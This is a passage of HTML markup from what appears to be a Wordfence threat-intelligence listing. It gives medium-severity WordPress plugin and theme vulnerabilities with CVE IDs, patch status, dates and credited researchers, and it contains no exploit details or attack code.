<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chinhnguyen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a9694ec4dc4027d7cceada3b72f41fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a9694ec4dc4027d7cceada3b72f41fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chinhnguyen" target="_blank" rel="noopener">ChinhNguyen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/565980d7-8dc9-42a4-90c5-2f75af52fb8e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff2f1261-3c61-4a0f-a7db-8e9b28b9af27" target="_blank" rel="noopener">Formidable Forms Signature Online Contract Automation &lt;= 2.0.1 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65523" target="_blank" rel="noopener noreferrer">							CVE-2026-65523						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forms-signature-formidable-online-contract-automation" target="_blank" rel="noopener">Formidable Forms Signature Online Contract Automation</a> <span class="wfvr-software-slug">[forms-signature-formidable-online-contract-automation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff2f1261-3c61-4a0f-a7db-8e9b28b9af27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b45b352-4bc4-4338-9812-649541db4f4a" target="_blank" rel="noopener">Gillion &lt;= 4.13 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66477" target="_blank" rel="noopener noreferrer">							CVE-2026-66477						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/gillion" target="_blank" rel="noopener">Gillion | Multi-Concept Blog/Magazine &amp; Shop WordPress AMP Theme</a> <span class="wfvr-software-slug">[gillion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b45b352-4bc4-4338-9812-649541db4f4a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/81557da6-c98a-4e71-ab88-e987a3650158" target="_blank" rel="noopener">Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder &lt;= 1.9.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Form Entry Modification/Trash via process_bulk_action()</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11995" target="_blank" rel="noopener noreferrer">							CVE-2026-11995						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutena-forms" target="_blank" rel="noopener">Gutena Forms – Contact Form, Survey Form, Feedback Form, Booking Form, and Custom Form Builder</a> <span class="wfvr-software-slug">[gutena-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/endang-alfarisi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/531a20fc5603f1e53d92613733a0fa01.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="531a20fc5603f1e53d92613733a0fa01"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/endang-alfarisi" target="_blank" rel="noopener">Endang Alfarisi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/81557da6-c98a-4e71-ab88-e987a3650158" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87e98702-6616-4e11-aeaf-733cd9d700fe" target="_blank" rel="noopener">JetBlocks for Elementor &lt;= 1.5.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61976" target="_blank" rel="noopener noreferrer">							CVE-2026-61976						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blocks" target="_blank" rel="noopener">JetBlocks for Elementor</a> <span class="wfvr-software-slug">[jet-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87e98702-6616-4e11-aeaf-733cd9d700fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26b13067-540f-4ac2-904a-5c9e39622280" target="_blank" rel="noopener">JetReviews &lt;= 3.0.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61975" target="_blank" rel="noopener noreferrer">							CVE-2026-61975						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-reviews" target="_blank" rel="noopener">JetReviews</a> <span class="wfvr-software-slug">[jet-reviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26b13067-540f-4ac2-904a-5c9e39622280" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd93b123-bcab-41a2-910c-8d15e726297b" target="_blank" rel="noopener">JetSearch &lt;= 3.6.1.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61977" target="_blank" rel="noopener noreferrer">							CVE-2026-61977						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-search" target="_blank" rel="noopener">JetSearch</a> <span class="wfvr-software-slug">[jet-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd93b123-bcab-41a2-910c-8d15e726297b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09e158d2-f9a6-41a6-a91f-1763a1a44b04" target="_blank" rel="noopener">Klubraum Membership Request &lt;= 1.1.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Plugin Settings Update</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4604" target="_blank" rel="noopener noreferrer">							CVE-2026-4604						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/klubraum-membership-request" target="_blank" rel="noopener">Klubraum Membership Request</a> <span class="wfvr-software-slug">[klubraum-membership-request]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09e158d2-f9a6-41a6-a91f-1763a1a44b04" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/793a7ef0-8938-47a6-80ed-83f69fbbb27f" target="_blank" rel="noopener">MailerPress &lt;= 1.5.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Modification via REST API Endpoint</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18436" target="_blank" rel="noopener noreferrer">							CVE-2026-18436						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailerpress" target="_blank" rel="noopener">MailerPress – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails</a> <span class="wfvr-software-slug">[mailerpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/804a3b07eb5cd875d04cf09c04e08a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="804a3b07eb5cd875d04cf09c04e08a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener">Jakub Lipiński (A3RES)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/793a7ef0-8938-47a6-80ed-83f69fbbb27f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/159d031b-0362-4625-9d98-3908401c8ee8" target="_blank" rel="noopener">MailPress &lt;= 1.5.0 &#8211; Missing Authorization to Unauthenticated Contact Updates</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18437" target="_blank" rel="noopener noreferrer">							CVE-2026-18437						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailerpress" target="_blank" rel="noopener">MailerPress – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails</a> <span class="wfvr-software-slug">[mailerpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/804a3b07eb5cd875d04cf09c04e08a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="804a3b07eb5cd875d04cf09c04e08a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener">Jakub Lipiński (A3RES)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/159d031b-0362-4625-9d98-3908401c8ee8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5ea849a-2017-4354-96e7-18fd309046f2" target="_blank" rel="noopener">Mapster WP Maps &lt; 1.24.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14839" target="_blank" rel="noopener noreferrer">							CVE-2026-14839						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapster-wp-maps" target="_blank" rel="noopener">Mapster WP Maps</a> <span class="wfvr-software-slug">[mapster-wp-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alexander-jurkschat" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6deed0b6697b2b816e73139757aead6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6deed0b6697b2b816e73139757aead6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alexander-jurkschat" target="_blank" rel="noopener">Alexander Jurkschat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5ea849a-2017-4354-96e7-18fd309046f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fc683c5-6939-4750-aba2-0e1f3b33ab5a" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt;= 3.7.39 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28145" target="_blank" rel="noopener noreferrer">							CVE-2026-28145						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fc683c5-6939-4750-aba2-0e1f3b33ab5a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb869dd-c8cf-4849-a13f-6c8cf1c196b6" target="_blank" rel="noopener">PDFDraft &lt;= 1.1.0 &#8211; Missing Authorization to Unauthenticated Sensitive PDF Disclosure via &#8216;slug&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12124" target="_blank" rel="noopener noreferrer">							CVE-2026-12124						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdfdraft" target="_blank" rel="noopener">PDFDraft – Drag &amp; Drop PDF Builder, PDF Viewer, Embed &amp; Download PDF, Certificate &amp; Invoice Designer</a> <span class="wfvr-software-slug">[pdfdraft]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdoo-slax" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0112689c0902c446cae4406a12504fb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0112689c0902c446cae4406a12504fb2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdoo-slax" target="_blank" rel="noopener">sl4x0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb869dd-c8cf-4849-a13f-6c8cf1c196b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/da675a50-c7ac-4859-9795-4b0f1dc56c7b" target="_blank" rel="noopener">Persian Elementor (المنتور فارسی) &lt;= 2.8.1 &#8211; Unauthenticated Price Manipulation via ZarinPal Widget</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1982" target="_blank" rel="noopener noreferrer">							CVE-2026-1982						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-elementor" target="_blank" rel="noopener">المنتور فارسی</a> <span class="wfvr-software-slug">[persian-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/808cc96dd7906a4eb995e7f5e1d17296.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="808cc96dd7906a4eb995e7f5e1d17296"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener">Chiao-Lin Yu (Steven Meow)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/da675a50-c7ac-4859-9795-4b0f1dc56c7b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22175f1f-1dc0-45a1-a72e-3135ea6de7fc" target="_blank" rel="noopener">Pixelavo – Server Side Tracking &amp; Pixel + AI Ads Tools &lt; 1.5.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
